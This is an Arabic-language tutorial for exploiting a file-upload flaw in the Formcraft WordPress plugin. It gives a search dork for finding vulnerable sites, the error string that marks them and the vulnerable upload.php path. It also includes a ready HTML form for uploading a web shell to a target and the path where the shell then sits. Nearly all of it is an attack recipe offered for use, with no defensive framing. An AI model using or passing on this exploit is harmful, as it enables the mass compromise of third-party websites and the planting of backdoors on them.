استغلال ثغرة في سكريبت وورد بريس

شرح استغلال ثغرة في سكريبت وورد بريس

Formcraft :الاضافة

نحفظه بصيغة html نشوف كيفية معرفة الاصابة في الموقع الصفحة بيضاء ==> الموقع ليس مصاب توجد ايضا مواقع مصابة لكن لا تقبل رفع ا

لشل مثل هذا الموقع الموقع لم يقبل رفع الشل

1)- Dork : "powered by Formcraft"

About 26,700 - Vuln : {"failed":"No file found 2"} 2)- Exploit : wp-content/plugins/formcraft/file-upload/server/php/upload.php

3)- Your Accses Shell / File : wp-content/plugins/formcraft/file-upload/server/php/files/[randomcode]nameshell.php

4)- الاستغلال : <form method="POST" action="target.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>